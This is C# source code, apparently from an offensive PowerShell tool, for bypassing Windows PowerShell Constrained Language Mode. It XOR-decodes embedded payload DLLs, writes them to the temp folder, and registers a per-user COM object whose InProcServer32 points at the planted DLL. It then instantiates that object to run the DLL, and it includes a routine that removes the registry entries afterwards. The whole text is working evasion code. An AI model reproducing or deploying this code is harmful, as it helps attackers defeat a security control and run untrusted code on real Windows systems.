public static bool ProperDisable(PowerShell rs, CustomPSHost host) { if (DisableClm.Verbose) { Console.WriteLine("[.] Step 0. Plant DLL files in: %TEMP%"); } using (BinaryWriter file = new BinaryWriter(File.Open( Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEASSEMBLY_PATH), FileMode.Create))) { byte[] data = Decoder.XorDecodeBinary(ClmEmbeddedFiles.ClmDisableAssemblyData, ClmEmbeddedFiles.FilesXorKey); file.Write(data); } using (BinaryWriter file = new BinaryWriter(File.Open( Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEDLL_PATH), FileMode.Create))) { byte[] data = Decoder.XorDecodeBinary(ClmEmbeddedFiles.ClmDisableDllData, ClmEmbeddedFiles.FilesXorKey); file.Write(data); } if (DisableClm.Verbose) { Console.WriteLine("[.] Step 1. Creating custom COM object."); } if (!CreateCOM(rs, host)) { if (DisableClm.Verbose) { Console.WriteLine("[-] Could not register custom COM object. CLM bypass failed."); } return(false); } if (DisableClm.Verbose) { Console.WriteLine("[.] Step 2. Invoking it..."); } if (DisableClm.Verbose) { Stracciatella.ExecuteCommand($"New-Object -ComObject {COM_NAME}", rs, host, true, true, false); } System.Threading.Thread.Sleep(1000); return(true); }
private static bool CreateCOM(PowerShell rs, CustomPSHost host, bool deregister = false) { string dllPath = @"$($Env:Temp)\ClmDisableDll.dll"; // Well I'm to lazy to reimplement it in C# string registerCOM = @" $sid = (whoami /user | select-string -Pattern ""(S-1-5[0-9-]+)"" -all | select -ExpandProperty Matches).value; New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS; $key = 'HKU:\{0}_classes' -f $sid; $key = 'HKU:\{0}_classes\CLSID\' -f $sid; New-Item -Force -Path $key -Name """ + COM_GUID + @"""; $key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, """ + COM_GUID + @"""; New-Item -Force -Path $key -Name 'InProcServer32'; New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + COM_DESCRIPTION + @""" -PropertyType String; $key = 'HKU:\{0}_classes\CLSID\{1}\InProcServer32' -f $sid, """ + COM_GUID + @"""; New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + dllPath + @""" -PropertyType String; New-ItemProperty -Force -Path $key -Name 'ThreadingModel' -Value ""Apartment"" -PropertyType String; $key = 'HKU:\{0}_classes' -f $sid; New-Item -Force -Path $key -Name """ + COM_NAME + @"""; $key = 'HKU:\{0}_classes\{1}' -f $sid, """ + COM_NAME + @"""; New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + COM_DESCRIPTION + @""" -PropertyType String; New-Item -Force -Path $key -Name 'CLSID'; $key = 'HKU:\{0}_classes\{1}\CLSID' -f $sid, """ + COM_NAME + @"""; New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + COM_GUID + @""" -PropertyType String; "; string deregisterCOM = @" $sid = (whoami /user | select-string -Pattern ""(S-1-5[0-9-]+)"" -all | select -ExpandProperty Matches).value; New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS | out-null $key = 'HKU:\{0}_classes\{1}' -f $sid, """ + COM_NAME + @"""; Remove-Item -Force -Path $key -Recurse | out-null $key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, """ + COM_GUID + @"""; Remove-Item -Force -Path $key -Recurse | out-null "; if (deregister) { return(Stracciatella.ExecuteCommand(deregisterCOM, rs, host, true, true).Length > 0); } else { return(Stracciatella.ExecuteCommand(registerCOM, rs, host, true, true).Length > 0); } }